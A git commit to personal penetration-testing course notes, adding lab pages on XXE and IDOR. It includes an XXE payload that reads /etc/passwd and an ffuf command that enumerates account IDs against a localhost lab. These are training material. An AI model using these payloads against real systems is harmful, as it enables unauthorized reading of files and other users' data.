PEH - Web app

syselement · syselement · commit ce594eeccb7b · 2025-02-28T14:52:48.000+01:00
diff --git a/README.md b/README.md
@@ -6,7 +6,7 @@
 
 - [x] [Linux 101](linux-101/README.md) by Brent Eskridge
 - [x] [Mobile Application Penetration Testing](mapt/README.md) by [Aaron Wilson](https://www.linkedin.com/in/wilson-security/overlay/about-this-profile/)
-- [ ] [Practical Ethical Hacking](peh/README.md) by [Heath Adams](https://www.thecybermentor.com/)
+- [x] [Practical Ethical Hacking](peh/README.md) by [Heath Adams](https://www.thecybermentor.com/)
 
 ---
 
diff --git a/SUMMARY.md b/SUMMARY.md
@@ -80,6 +80,15 @@
     - [AD - Case Studies](peh/4-active-directory/6-ad-casestudies.md)
   - [5. Post Exploitation](peh/5-post-exploitation/README.md)
   - [6. Web Application](peh/6-webapp/README.md)
+    - [Web App Lab Setup](peh/6-webapp/1-web-lab.md)
+    - [Web App - SQL Injection](peh/6-webapp/2-web-sqli.md)
+    - [Web App - XSS](peh/6-webapp/3-web-xss.md)
+    - [Web App - Command Injection](peh/6-webapp/4-web-cmd-injection.md)
+    - [Web App - Insecure File Upload](peh/6-webapp/5-web-file-upload.md)
+    - [Web App - Authentication Attacks](peh/6-webapp/6-web-auth-attacks.md)
+    - [Web App - XXE](peh/6-webapp/7-web-xxe.md)
+    - [Web App - IDOR](peh/6-webapp/8-web-idor.md)
+    - [Web App - Capstone Practical Lab](peh/6-webapp/9-web-capstone-lab.md)
   - [7. Wireless Attacks](peh/7-wireless/README.md)
   - [8. Legal Documentation & Report Writing](peh/8-report/README.md)
   - [🌐 PEH References](peh/peh-references.md)
diff --git a/peh/6-webapp/.gitbook/assets/2025-02-28_13-29-38_929.png b/peh/6-webapp/.gitbook/assets/2025-02-28_13-29-38_929.png
diff --git a/peh/6-webapp/.gitbook/assets/2025-02-28_13-35-42_930.png b/peh/6-webapp/.gitbook/assets/2025-02-28_13-35-42_930.png
diff --git a/peh/6-webapp/7-web-xxe.md b/peh/6-webapp/7-web-xxe.md
@@ -1,2 +1,44 @@
 # Web App - XXE
 
+> - [XXE (XML external entity) injection | AppSecExplained](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection)
+> - [PayloadsAllTheThings - XXE Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md)
+
+➡️ **XML External Entity** (**XXE**) injection is a security vulnerability that occurs when an application processes XML input containing references to external entities without proper validation.
+
+---
+
+##  XXE - External Entities Injection
+
+```bash
+cd $HOME/peh/labs/user-content
+	xxe-exploit.xml
+	xxe-safe.xml
+
+cat xxe-safe.xml
+
+<?xml version="1.0" encoding="UTF-8"?>
+<creds>
+    <user>testuser</user>
+    <password>testpass</password>
+</creds>
+
+cat xxe-exploit.xml
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE creds [
+<!ELEMENT creds ANY >
+<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+<creds><user>&xxe;</user><password>pass</password></creds>
+```
+
+- Upload `xxe-safe.xml` and check the result.
+- Try `xxe-exploit.xml`
+  - **XML Declaration & DOCTYPE**: Declares an XML document and defines an external entity
+  - **Entity Definition**: The external entity `xxe` is set to read the file `/etc/passwd`
+  - **Usage in XML**: The entity is referenced in the `<user>` tag
+  - **Result**: If vulnerable, the XML parser includes the file content in the output
+
+![](.gitbook/assets/2025-02-28_13-29-38_929.png)
+
+---
+
diff --git a/peh/6-webapp/8-web-idor.md b/peh/6-webapp/8-web-idor.md
@@ -1,2 +1,53 @@
 # Web App - IDOR
 
+> - [PayloadsAllTheThings - Insecure Direct Object References](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References)
+
+➡️ **Insecure Direct Object Reference** (**IDOR**) occurs when an application exposes direct access to objects (e.g. database records, files, etc) without proper authorization, allowing attackers to manipulate or access unauthorized data.
+
+---
+
+##  IDOR - Insecure Direct Object Reference
+
+- Try to change the `account` object ID in the URL to something else
+  - `http://localhost/labs/e0x02.php?account=1009`
+  - `http://localhost/labs/e0x02.php?account=1010`
+
+![](.gitbook/assets/2025-02-28_13-35-42_930.png)
+
+- Enumerate all the accounts within the application
+
+```bash
+cd $HOME/tcm/peh/webapp
+
+# Create IDs file from 1 to 1000
+python3 -c 'for i in range(1,2001): print(i)' > num.txt
+
+ffuf -u 'http://localhost/labs/e0x02.php?account=FUZZ' -w num.txt -fs 849
+```
+
+```bash
+# Valid accounts
+1000
+1001
+1002
+1004
+1006
+1005
+1009
+1007
+1010
+1008
+1016
+1012
+1014
+1019
+1011
+1017
+1015
+1013
+1018
+1003
+```
+
+---
+
diff --git a/peh/6-webapp/9-web-capstone-lab.md b/peh/6-webapp/9-web-capstone-lab.md
@@ -1 +1,3 @@
 # Web App - Capstone Practical Lab
+
+Analyze and pentest the web application by finding all the impactful issues.
diff --git a/peh/6-webapp/README.md b/peh/6-webapp/README.md
@@ -4,15 +4,15 @@
 
 ## Sections
 
-1. [Web App Lab Setup](2-web-lab.md)
-2. [Web App - SQL Injection](3-web-sqli.md)
-3. [Web App - XSS](4-web-xss.md)
-4. [Web App - Command Injection](5-web-cmd-injection.md)
-5. [Web App - Insecure File Upload](6-web-file-upload.md)
-6. [Web App - Authentication Attacks](7-web-auth-attacks.md)
-7. [Web App - XXE](8-web-xxe.md)
-8. [Web App - IDOR](9-web-idor.md)
-9. [Web App - Capstone Practical Lab](10-web-capstone-lab.md)
+1. [Web App Lab Setup](1-web-lab.md)
+2. [Web App - SQL Injection](2-web-sqli.md)
+3. [Web App - XSS](3-web-xss.md)
+4. [Web App - Command Injection](4-web-cmd-injection.md)
+5. [Web App - Insecure File Upload](5-web-file-upload.md)
+6. [Web App - Authentication Attacks](6-web-auth-attacks.md)
+7. [Web App - XXE](7-web-xxe.md)
+8. [Web App - IDOR](8-web-idor.md)
+9. [Web App - Capstone Practical Lab](9-web-capstone-lab.md)
 
 ---
 
diff --git a/peh/peh-references.md b/peh/peh-references.md
@@ -245,7 +245,12 @@
 
 - [Authentication | AppSecExplained](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication)
   - [Authentication vulnerabilities | Web Security Academy](https://portswigger.net/web-security/authentication)
+- [PayloadsAllTheThings - XXE Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md)
+  - [What is XXE (XML external entity) injection? | Web Security Academy](https://portswigger.net/web-security/xxe)
+  - [XXE (XML external entity) injection | AppSecExplained](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection)
 
+- [PayloadsAllTheThings - Insecure Direct Object References](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References)
+  - [Insecure direct object references (IDOR) | Web Security Academy](https://portswigger.net/web-security/access-control/idor)
 
 
 

Original file line number	Diff line number	Diff line change
`@@ -1 +1,3 @@`
`1`	`1`	`# Web App - Capstone Practical Lab`
	`2`	`+`
	`3`	`+Analyze and pentest the web application by finding all the impactful issues.`